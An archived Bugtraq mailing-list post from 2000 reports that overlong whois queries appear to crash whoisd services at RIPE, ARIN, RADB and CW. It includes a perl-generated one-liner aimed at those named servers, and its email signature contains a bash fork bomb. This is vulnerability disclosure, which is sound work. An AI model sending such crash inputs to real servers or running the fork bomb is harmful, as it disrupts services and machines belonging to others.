Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Wed, 2 Feb 2000 13:29:07 +0100
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: no comment

In following example (which works only with Linux version of 'whois'
command - *BSD version has built-in query size limits), replace
joshua.ripe.net with your favourite - whois.arin.net or whois.radb.net...

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 10000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
% No entries found for the selected source(s).
%
% If you would like to search on arbitrary strings,
% please see the Database page on the RIPE NCC
% web-site at http://www.ripe.net/ripencc/pub-services/db/
% This will only work for RIPE data.
%
% Please note that RIPE whoisd service temporarily
% does not mirror RADB and CW databases. Please query
% these databases directly at:
% whois.radb.net for RADB and
% whois.cw.net for CW.

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 20000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html

[lcamtuf@www lcamtuf]$

For whois.arin.net and whois.radb.net, the 'magic point' is at about 248
bytes of query sent. whois.ripe.net seems to panic with buffer larger than
30k, but only with specific sequences (like "0.0.0"...). whois.cw.net can
stand even 80-90kB before crashing sessions.

I have no idea how to explain it - seems just like regular buffer overrun
in whoisd started from inetd (as it is suggested). But, of course, we
can't get sources of currently running services, it couls be addressed as
"silent dropping excessive data portions with system-dependent data amount
limit". Only one thing is mysterious - whoisd service producess verbose
output on any query syntax error or any other problem, except for that.
And RFC don't mention maximal query length nor _any_ situation when
connection should be silently dropped.  That's another reason to think
whoisd crashed.

_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl&#093;
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

АКЦИЯ! ПОДПИШИСЬ на журнал Linux Format до 31 января 2012 года и выиграй СУПЕРПРИЗ! Журнал "Linux Format" (Линукс Формат)- Единственный в России и странах СНГ журнал на русском языке, посвящённый Linux и свободному ПО. Журнал для IT-директоров, IT-менеджеров, программистов, системных администраторов, учителей школ и преподавателей ВУЗов и всех пользователей ПК. В каждом выпуске: Новости индустрии OpenSource, обзоры новинок свободного ПО, обучающие и методические статьи. Каждый, кто оформит подписку, получает бонус- объёмные наклейки на системный блок и подарки: с одним из первых выпусков журнала в 2012 году- диск с архивом номеров за 2005-2011 г.г. и ежемесячно электронную версию журнала в pdf-формате. Подробнее о проведении акции вы можете прочитать на странице сайта.